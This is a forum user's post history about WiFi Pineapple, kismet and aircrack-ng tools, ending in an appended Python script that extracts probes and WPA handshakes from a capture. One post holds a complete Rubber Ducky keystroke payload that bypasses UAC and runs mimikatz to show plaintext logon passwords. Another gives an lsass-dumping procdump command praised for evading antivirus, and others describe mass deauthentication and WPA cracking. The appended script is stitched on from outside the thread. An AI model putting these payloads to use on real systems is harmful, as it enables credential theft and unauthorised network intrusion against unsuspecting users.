shutin

Active Members
  • Posts: 78
  • Joined
  • Last visited
  • Days Won: 2

Everything posted by shutin

  1. Yeah, that's about it. Have you thought about getting someone who is already going to fly (civilian, but especially military) to simply bring it with their luggage?
  2. I ranted about my experiences with this gadget here: https://forums.hak5.org/index.php?/topic/30654-my-mkiv-30-experience-so-far/ A user contacted me and I have to let him be first in line at this price, but if he doesn't want it, I'm open to other offers. Here's what I wrote him: Feel free to name your price or trade stuff. Considering the new one is $99 and I've never got this one to work, $50 shipped. I'll take bitcoin too. It's missing the AC adapter that came with it, but it doesn't matter because I have the USB cable. I also have the Pineapple Juice battery pack for portability and the case that came with it. Also a cat5 cable and a USB thumb drive I was using for storage. The only janky part is the antenna. It's never had bad performance from that, but it's cheap and the part where it connects to the main unit isn't as sturdy as I'd like. You can't fully screw it down so it's always a little loose. Never been a problem, but I just want to be very open about everything, esp. considering I never got the damn thing working!! https://dl.dropboxusercontent.com/u/9698057/20131231_003510.jpg
  3. Oh, I agree the developers worked super hard to get the thing where it got. If it truly didn't work, no one would buy it or code for it. I just reached the end of my rope. I'll settle for an Android app that can capture probes :)
  4. If I charged you US$50 for a mk4 and you paid shipping, how much would that come out to for you? Looking to sell.. https://dl.dropboxusercontent.com/u/9698057/20131231_003510.jpg
  5. This is an awesome writeup man. You are telling it like it is. I always felt like somehow I was the fuckup because nothing ever worked right. And by most forum posts, you'd think the thing worked like a champ all the time. But honestly? It never even did Karma right. Sure, every now and then I'd see a probe listed, but not often. I had a way better experience with some big script (PwnStar?) and a netbook using karma to autochange the network to match probing clients. At least you still have the spirit of trying to make it work. I know how incredibly frustrating it can be to reset the damn thing over and over and reinstall. I must have reset it more times than dollars I paid for the thing. Every time I look at mine I think "oh, I'll give it another shot" but what is the point? I'm not learning anything by installing infusions. I'm not learning by running a script to try and set up ICS on a Mac (don't even bother with that one). If I'm not finally solving a problem, it's just been an exercise in frustration. And honestly? Where the hell am I going to deploy it? It's pretty much illegal to run that shit and I'm not a professional pen tester, so it comes down to just being a novelty in my kit. It was fun at first. But I want to sell mine.. Bay Area, CA. I'll take BTC :P
  6. I'm not understanding what you want. You want to monitor everyone trying to connect to your home AP? Use kismet (on another computer) and don't channel hop. I don't see where karma comes into play here at all. Karma just broadcasts APs that clients are looking for. It has nothing really to do with logging, although all connections attempted to the Pineapple should show up on the homepage of the interface. The best solution I've found to track attempted connections to any AP is kismet, and it's nice and passive. Perhaps you should rephrase your questions because I'm having trouble understanding exactly what you are trying to accomplish.
  7. I have extensive experience with both and am happy to answer any questions. Overall, kismet is the best for using multiple cards and doing wardriving-style surveys. For one thing, you can change the channels that it will hop/stay on interactively in the app. So let's say you want to hunt for WPA2 networks to capture the handshake. You can originally hop until you find the channel your target AP is on. Then you can set kismet to stay on that channel exclusively. As far as the aircrack-ptw plugin for it, this will only work if the WEP AP is broadcasting a LOT of traffic, because kismet will only capture IVs for a short time and then discards them if it can't crack it. One technique that would work well is to have kismet listening on the channel with the PTW plugin enabled, then use aircrack or wifite or something to inject a bunch of ARP requests to generate the traffic you need, and kismet will automatically crack it. Another great thing about kismet is that you can specify a bunch of WEP keys you have and it will automatically decrypt all the WEP traffic it sees and put that in the capture. You specify that in the kismet.conf file. I absolutely love kismet. One other benefit is that it records ALL client connections it sees over time and puts that in the output log. The aircrack suite, on the other hand, is more useful for very targeted attacks. You can easily specify the exact ESSID you want to use, get visual confirmation when it captures a handshake (kismet won't do that) and keep your overall file sizes low instead of the keep-everything logs kismet outputs. Another tool I haven't seen mentioned is pyrit. It has its quirks and bugs, but I've had some pretty good success with the "stripLive" feature. Basically you run it, specifying your interface to use and the output file to write, and it sits and listens and records ONLY the handshakes that it sees. Those handshakes can be used in any cracking program you want and the file size is very small.
     To extract just the handshake you want for later use in oclHashcat you can use "aircrack-ng -J". This will read a pcap file and find the handshakes and let you choose which one to attack. tl;dr: kismet for wardriving and keeping an eye on your overall wifi environment. aircrack-ng for targeted attacks and dumps and of course cracking. Hope that helps!
  8. Thanks! Mimikatz is a weird tool. Is there any way to get it to spit output into a text file? It's mostly in French so it's a bit hard to understand. There is also no "help". I really want to get my version to dump the output back to the ducky drive instead of just displaying the console window.
  9. Very interested, would even offer my Pineapple since I'm sick of trying to make it work. However, from what I've read you need that specialized PSU. 5V/2A with a custom plug. Did you just not buy one for it or.. How am I going to get it to work? I don't want to have to order the PSU and eMMC from South Korea at $30 shipping. Doesn't really save me any money. What were the problems you were running into with the software?
  10. Woo! Finally posting my own working payload! Thanks to overwraith and readmeatuk for their base code that I just tied together. This basically does exactly what readmeatuk's code does except you won't need an internet connection. Requirements: 1) Twin Duck firmware or whatever it's called that lets you have USB storage as well as firing inject.bin upon insertion. 2) mimikatz.exe (either 32-bit or 64-bit depending on target environment) placed at the root of that DUCKY drive (drive name MUST be "DUCKY"). Get it here: http://blog.gentilkiwi.com/mimikatz and use the exe from the "alpha" subdirectory. Notes: I tried to do it with procdump but it takes a LONG time to write out the 36 meg output file to the card and the window for procdump basically freezes and you have to forcibly kill it. You could probably write the .dmp file to a local disk and then copy it to the ducky, but it's still going to take a while. I don't think that many AV programs are looking for mimikatz so it's fairly safe. This script could be optimized a little; it's a bit slow and it leaves two windows open. You want to leave the mimikatz window open though, because after this f$#%^$ker executes you'll be staring at plaintext passwords for the logged on users!@!$#@

      REM Author: shutin who just tied two other authors together:
      REM overwraith for the exe running stuff and redmeatuk who brought mimikatz to the party
      REM Name: Runmimikatz.txt
      DEFAULT_DELAY 75
      DELAY 3000
      REM get a cmd prompt this way because it's admin and we need that for mimikatz
      CONTROL ESCAPE
      DELAY 1000
      STRING cmd
      DELAY 1000
      REM the admin part booyah
      CTRL-SHIFT ENTER
      DELAY 1000
      ALT y
      DELAY 300
      ENTER
      REM Change directories because System32 appears to be protected.
      STRING CD %TEMP%
      ENTER
      REM Make batch file that waits for SD card to mount.
      REM Delete batch file if already exists
      STRING erase /Q DuckyWait.bat
      ENTER
      STRING copy con DuckyWait.bat
      ENTER
      REM DuckyWait.bat contents
      STRING :while1
      ENTER
      STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
      ENTER
      STRING if Exist %myd% (
      ENTER
      STRING goto break
      ENTER
      STRING )
      ENTER
      STRING timeout /t 30
      ENTER
      STRING goto while1
      ENTER
      STRING :break
      ENTER
      REM FINALLY ACTUALLY RUN AN EXE
      STRING START %myd%\mimikatz.exe
      ENTER
      REM Ctrl-Z then ENTER closes "copy con" and writes DuckyWait.bat
      CONTROL z
      ENTER
      STRING DuckyWait.bat
      ENTER
      DELAY 1000
      ENTER
      DELAY 3000
      STRING privilege::debug
      DELAY 300
      ENTER
      DELAY 1000
      STRING sekurlsa::logonPasswords full
      DELAY 300
      ENTER
  11. WOW! mimikatz is amazing! I'm surprised this isn't more widely known. Everyone is so busy worrying about cracking Windows hashes and whatnot when they could be just doing this instead. mimikatz is like reaver compared to trying to brute force WPA keys. It just spits it out in plaintext! I've been reading a tutorial about how you can just use the Sysinternals tool procdump.exe to generate the dmp file like this: procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp The beauty here is that procdump will not get flagged by AV like mimikatz already is (6/xx on VirusTotal already) because it's an official Microsoft utility! All we need is to have the ducky run procdump and put the file on the duck and then we can run mimikatz on it later on our own PC. How come everyone always wants the duck to grab things from the internet? We have the capability to save files on the ducky so why not use that instead? I'm going to try and come up with a payload that simply saves a procdump file to the ducky and I'll post it here.
  12. I appreciate this list but I haven't had any luck with it. Does anyone know by chance if this includes the passwords that are included in the famous renderman rainbow tables? I will be trying those next. For those new to WPA cracking I have a few short tips I learned along the way.. Tip #0 is don't even bother unless you are using a graphics card to crack. For a long time, pyrit was the go-to app for this. pyrit is not very user-friendly. I wouldn't bother with it. It's given me nothing but headaches and fails to run properly on many machines I try to compile it on. The stripLive command works ok, but I'd veer clear of pyrit and focus on the tried and true classic aircrack-ng suite. First, always make sure you are sitting on one channel when collecting a handshake. Don't be hoppin', it won't work very well. So you have airodump-ng or kismet running on a single channel for a couple of days or so. You can try to force some deauths using mdk3 or aireplay-ng -0 or airdrop-ng, but why be a dick, just wait and let the handshakes come to you. If you are in a hurry you can always use the mdk3 amok mode and nuke everyone around you for maximum collection power. I haven't thought of it till just now (prolly because it'd be illegal somehow) but you might be able to wardrive around firing mdk3 on one card and sniffing using airodump on another and just vacuum in handshakes. That's pretty evil, don't do it. Now you've got a big-ass 2 gig .pcap dump file filled with total crap. Beacons, broadcast traffic, you name it. You can extract juuuust the goodies with aircrack-ng -J outfile.cap. This will examine the pcap and show you where you have successful handshakes captured. You then save them to a tiny .hccap file strictly for use with oclHashcat-plus. What a great program! I hate saying this, but it runs in Windows perfectly! I loathe Windows now but it's the only OS that can run my awesome zero-day new NVIDIA card with hella CUDA cores.
      Before that program everyone was using pyrit for the CUDA functionality and as I said, it's a pain. aircrack-ng is not going to handle the massive dictionary files you want to use. Download oclHashcat and read some tutorials about how to use it to crack your hccap file with your super duper "Super WPA" file you grabbed from this post. Another note, the .rar file in this post is (I think) made with rar v3 or something; I couldn't get a successful extraction with 7zip. You'll need to download the unrar.exe command line tool (for Windows, not DOS) from the WinRAR labs site. Beware of any other RAR programs as they all seem to be bundled with malware these days. You can also safely extract it in Linux. It takes me about 6 hours to run through the SuperWPA dictionary at 44k hashes a second using a $400 video card. That's actually pretty crappy performance for such an expensive card compared to some of the speeds I've seen posted online, but it's aight. Anyway, good luck. You'll need it. edit: the new version of aircrack supports dictionaries over 2 GB so it may work with this one.
  13. I emailed the company and they told me the VM image is there strictly for the convenience of their paying customers to download it whenever they need it. I think they should add maybe a sentence or two to #@%$@#% illustrate that but eh. Anyone actually played with this thing and have any comments on it? The whole package seems geared toward noob LEOs or something. I don't know that I like the idea of someone who has no idea what they are doing pointing and clicking on wifi networks to exploit. They might develop a taste for it.. With the advent of wifite.py wifi cracking can't get any easier. Silica just employs an easy-breezy exploit functionality like serving up rotten Java applets during the MITM portion, from what I understand of it.
  14. What seems to be the problem? Can you ssh to 172.16.42.1 using PuTTY? Does your pineapple broadcast an AP called "Pineapple ##:##" when you turn it on? Are you making sure you connect using the POE/WAN port, not the other one? Are you connecting to http://172.16.42.1:1471 (or whatever the specific port is, I'm not 100% sure but I know it isn't 80)?
  15. Very excited to try this script out but having problems... plugged in USB hub with flash drive and Alfa 36. Immediately noticed that there is no wlan0! Just 1 and 2, with the Alfa on 2. Device connected to internet via ethernet cable. Running 2.8.1. Cannot start "wireless" in pineapple status screen for whatever reason. I'm trying to connect to my WPA2 AP. Try ./connect.sh -i wlan2 <details omitted> Stopping karma Failed to connect to hostapd - wpa_ctrl_open: No such file or directory Invalid interface wlan2 Done. Now I know wlan2 is valid, but am I missing a file or something? For those having trouble downloading the script, maybe you should try what I did: just READ the file and copy and paste the text to your pineapple using nano/vi. Good work, I'm sure we'll get this working. I've had nothing but nightmares with NetworkManager and hope to avoid it as much as I can.
  16. Thanks for clarifying this. I believe Silica ships with a Ubiquiti adapter (SR-71 maybe?). There shouldn't be anything too magical about "activating" it. Perhaps you just need to spoof the MAC to match a Ubiquiti dongle? I donno, I imagine software piracy is frowned upon here so I won't pursue the topic any further, but dang it, I really want to just demo the software.
  17. I know this topic is almost a year old but I'm hoping someone might be following it. Using the MR3020 is a brilliant solution to get rid of the need for a wired connection. I have one lying around from my Minipwner project (ugh, that was no fun). Can you help me with the OpenWRT setup needed to make this work? I assume you would need to set the LAN interface to have a static IP of 172.16.42.42, but what about the gateway/DNS settings? You wouldn't want a DHCP server, right? I think I'm having trouble with the bridging aspect too. Currently if I connect to the pineapple and do a scan, the pineapple IP shows up, as well as the MR3020 and my connected device. I shouldn't be seeing the MR3020 since it should be acting as a bridge. Any help is appreciated! Thanks!
  18. Re: Alfa AWUS036H. Short answer, yes, buy that card, you won't be disappointed with it.
  19. Hey all, I remember seeing a Hak5 episode about this wifi pentesting tool called Silica that I wanted to check out. I went to their site and tried to figure out how to see a price or anything about it and came across this download page: http://www.immunityinc.com/downloads.shtml which has a link to the VM http://downloads.immunityinc.com/SILICA_VM.zip So I downloaded it and it boots up, but it doesn't recognize a simple Alfa. It throws a bunch of weird errors like this: [ 43.954420] rtl8187: disagrees about version of symbol ieee80211_rts_duration [ 43.954421] rtl8187: Unknown symbol ieee80211_rts_duration (err -22) Anyone know what is up with this image? Is it a trial or something you have to pay to activate or what? I'd like to see what they were talking about in the episode, since they kept the damn screen hidden the whole time. Anyone get this to work? Thanks
  20. I know this from the documentation, I was just including my different methods of trying to connect for completeness' sake.
  21. I didn't have it set to WAN, but I went and tried changing it and still, I don't get a "get an ip" link next to radio1 :( I should probably move these problems to the Network Manager infusion page and try to get some help there.
  22. One of the paradoxes I've found with antennas is that bigger is not necessarily better. When I purchased my Alfas, they came with a 2 ft long antenna that I was all excited about but then discovered after testing was much worse than the stock 6-incher. That cantenna looks cool but I think I'd get shot driving around my neighborhood with it. People would think I had a gun. I'm much more interested in building the classic Pringles cantenna. It would be much stealthier!
  23. Maybe uninstall wifi jammer then? I donno. I can add that the new beta has NOT bricked my router. It's safe. The reason you are seeing those people probing but not connecting is that they are probably probing for WPA/WPA2/WEP networks and not OPEN ones. I'm not positive, but I'm pretty sure that's why. KARMA isn't going to work on those so it doesn't bother trying to impersonate them. The way karma "gets" people is that they hopefully have a list of trusted, previously connected-to networks on their computer like this: MyHomeNetwork - WPA2 MySchoolsNetwork - WPA ThatCoffeeShopIJoinedOnce - OPEN Karma will impersonate the coffee shop one and the probing client will connect to it because it's the only one available (or the one with the highest signal).
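Added example, not code from this thread or from kismet, aircrack-ng or the Pineapple: a small Python script that does offline the two things the posts above describe. It pulls the directed probe requests (the remembered-network names a client leaks, which KARMA reacts to, posts 6 and 23) out of a capture, and it pulls the EAPOL 4-way handshake messages out of the same capture and reports which client/AP pairs have enough of the exchange to attack offline, which is what "aircrack-ng -J" looks for before writing an .hccap (posts 7 and 12). It assumes a classic pcap (not pcapng) with linktype 105, i.e. raw 802.11 frames with no radiotap header. The capture it parses is constructed inline; every MAC address and SSID in it is made up.

```python
"""Probe-request and EAPOL 4-way handshake extractor for raw-802.11 pcaps (added example)."""
import struct

LINKTYPE_IEEE802_11 = 105
LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"   # LLC/SNAP header, ethertype 0x888e
# EAPOL-Key "Key Information" bits used to tell the four handshake messages apart.
KI_PAIRWISE, KI_INSTALL, KI_ACK, KI_MIC, KI_SECURE = 0x0008, 0x0040, 0x0080, 0x0100, 0x0200


def fmt_mac(raw):
    return ":".join("%02x" % b for b in raw)


def pcap_packets(data):
    """Yield each captured frame from a classic pcap buffer (either byte order)."""
    magic, = struct.unpack_from("<I", data, 0)
    endian = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}.get(magic)
    if endian is None:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    linktype, = struct.unpack_from(endian + "I", data, 20)
    if linktype != LINKTYPE_IEEE802_11:
        raise ValueError("need raw 802.11 frames (linktype 105), got %d" % linktype)
    off = 24
    while off + 16 <= len(data):
        _sec, _usec, incl_len, _orig_len = struct.unpack_from(endian + "IIII", data, off)
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def handshake_message(key_info):
    """Classify an EAPOL-Key frame as message 1..4 of the 4-way handshake (None = group key)."""
    if not key_info & KI_PAIRWISE:
        return None
    if key_info & KI_ACK and not key_info & KI_MIC:
        return 1                       # AP -> STA, carries ANonce
    if key_info & KI_MIC and key_info & KI_ACK:
        return 3                       # AP -> STA, ANonce again, MIC'd
    if key_info & KI_MIC and key_info & KI_SECURE:
        return 4                       # STA -> AP, MIC only
    if key_info & KI_MIC:
        return 2                       # STA -> AP, SNonce + MIC: the one a cracker needs
    return None


def extract(pcap):
    """Return ({sta: {ssid, ...}}, {(bssid, sta): {message numbers}}) for a capture."""
    probes, handshakes = {}, {}
    for frame in pcap_packets(pcap):
        if len(frame) < 24:
            continue
        fc, = struct.unpack_from("<H", frame, 0)             # frame control is little-endian
        ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
        to_ds, from_ds = bool(fc & 0x0100), bool(fc & 0x0200)
        a1, a2 = frame[4:10], frame[10:16]
        if ftype == 0 and subtype == 4:                      # management / probe request
            body, off = frame[24:], 0
            while off + 2 <= len(body):                      # walk the information elements
                tag, ln = body[off], body[off + 1]
                if tag == 0 and ln:                          # SSID IE; empty SSID = wildcard probe
                    ssid = body[off + 2:off + 2 + ln].decode("utf-8", "replace")
                    probes.setdefault(fmt_mac(a2), set()).add(ssid)
                off += 2 + ln
        elif ftype == 2 and to_ds != from_ds:                # data frame, ignore WDS (both bits set)
            hdr = 26 if subtype & 0x8 else 24                # QoS data carries a 2-byte QoS control field
            body = frame[hdr:]
            if not body.startswith(LLC_SNAP_EAPOL) or len(body) < 15 or body[9] != 3:
                continue                                     # not an EAPOL-Key frame
            key_info, = struct.unpack_from(">H", body, 13)   # LLC/SNAP(8) + EAPOL hdr(4) + desc type(1)
            msg = handshake_message(key_info)
            if msg is None:
                continue
            bssid, sta = (a1, a2) if to_ds else (a2, a1)     # ToDS: addr1=BSSID; FromDS: addr2=BSSID
            handshakes.setdefault((fmt_mac(bssid), fmt_mac(sta)), set()).add(msg)
    return probes, handshakes


def crackable(handshakes):
    """Pairs with M2 (SNonce+MIC) plus an ANonce source (M1 or M3) can be attacked offline."""
    return sorted(k for k, msgs in handshakes.items() if 2 in msgs and (1 in msgs or 3 in msgs))


def build_sample_pcap():
    """Constructed capture (made-up MACs/SSIDs): one client probing for two remembered
    networks and completing M1/M2 with its AP, a wildcard probe, and a lone unanswered M1."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    frame = lambda fc, a1, a2, a3, body: struct.pack("<H", fc) + b"\x00\x00" + a1 + a2 + a3 + b"\x00\x00" + body
    probe_req = lambda sta, ssid: frame(0x0040, b"\xff" * 6, sta, b"\xff" * 6, bytes([0, len(ssid)]) + ssid + b"\x01\x01\x82")

    def eapol_key(fc, a1, a2, a3, key_info):                 # RSN key descriptor, 95 bytes, zeroed MIC/IV/RSC/ID
        key = struct.pack(">BHH", 2, key_info, 16) + b"\x00" * 8 + b"\x11" * 32 + b"\x00" * 48 + b"\x00\x00"
        return frame(fc, a1, a2, a3, LLC_SNAP_EAPOL + struct.pack(">BBH", 2, 3, len(key)) + key)

    ap, sta1, sta2, ap2, sta3 = (mac(m) for m in ("00:11:22:33:44:55", "66:77:88:99:aa:bb",
                                                  "de:ad:be:ef:00:01", "00:11:22:33:44:66", "de:ad:be:ef:00:02"))
    frames = [
        probe_req(sta1, b"MyHomeNetwork"),
        probe_req(sta1, b"ThatCoffeeShopIJoinedOnce"),
        probe_req(sta2, b""),                                            # wildcard: nothing for KARMA to imitate
        eapol_key(0x0208, sta1, ap, ap, KI_PAIRWISE | KI_ACK | 0x0002),   # M1, FromDS, AP -> STA
        eapol_key(0x0108, ap, sta1, ap, KI_PAIRWISE | KI_MIC | 0x0002),   # M2, ToDS, STA -> AP
        eapol_key(0x0208, sta3, ap2, ap2, KI_PAIRWISE | KI_ACK | 0x0002), # lone M1, no M2: useless
    ]
    out = bytearray(struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11))
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1388534400 + i, 0, len(f), len(f)) + f
    return bytes(out)


if __name__ == "__main__":
    probes, hs = extract(build_sample_pcap())
    for sta, ssids in sorted(probes.items()):
        print("%s probes for: %s" % (sta, ", ".join(sorted(ssids))))
    for (bssid, sta), msgs in sorted(hs.items()):
        print("%s <-> %s: M%s" % (bssid, sta, "/M".join(str(m) for m in sorted(msgs))))
    print("crackable:", crackable(hs))
```

To run it against a real file, replace build_sample_pcap() with open("dump.cap", "rb").read(); captures written by airodump-ng or kismet with a radiotap header (linktype 127) would need the radiotap length field stripped first, which this script deliberately does not do. The classification in handshake_message() is the same Key Information bit test aircrack-ng and hashcat's converters use, and the wildcard probe in the sample shows why KARMA only reacts to directed probes: an empty SSID gives it nothing to impersonate.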